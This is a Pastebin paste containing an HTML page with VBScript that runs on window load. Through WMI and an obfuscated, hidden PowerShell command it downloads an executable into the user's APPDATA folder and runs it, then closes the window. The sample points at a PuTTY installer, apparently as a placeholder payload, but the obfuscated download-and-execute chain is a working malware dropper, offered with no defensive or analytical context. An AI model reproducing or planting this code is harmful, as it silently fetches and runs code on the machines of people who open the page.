Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <head>
- <script language="VBScript">
- Sub window_onload
- const impersonation = 3
- Const HIDDEN_WINDOW = 12
- sep=nFKPbQ("Wb emS crip ti ng.SW bemLo ca tor")
- Set Locator = CreateObject(sep)
- Set Service = Locator.ConnectServer()
- Service.Security_.ImpersonationLevel=impersonation
- separado=nFKPbQ("Win 32_ Pro cessS tart up")
- Set objStartup = Service.Get(separado)
- Set objConfig = objStartup.SpawnInstance_
- Set Process = Service.Get("Win32_Process")
- gshjgjshsjhsusyuiweiwuwiuwiuiww = "Powershell -windowstyle hidden $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe'',$env:APPDATA+''\\''+''file.exe'')'|D; start-process($env:APPDATA+'\\'+'file.exe')"
- Error = Process.Create(gshjgjshsjhsusyuiweiwuwiuwiuiww, null, objConfig, intProcessID)
- window.close()
- end sub
- Function nFKPbQ(wjkwer)
- nFKPbQ = Replace(wjkwer, " ", "", 1, -1)
- End Function
- </script>
- </head>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement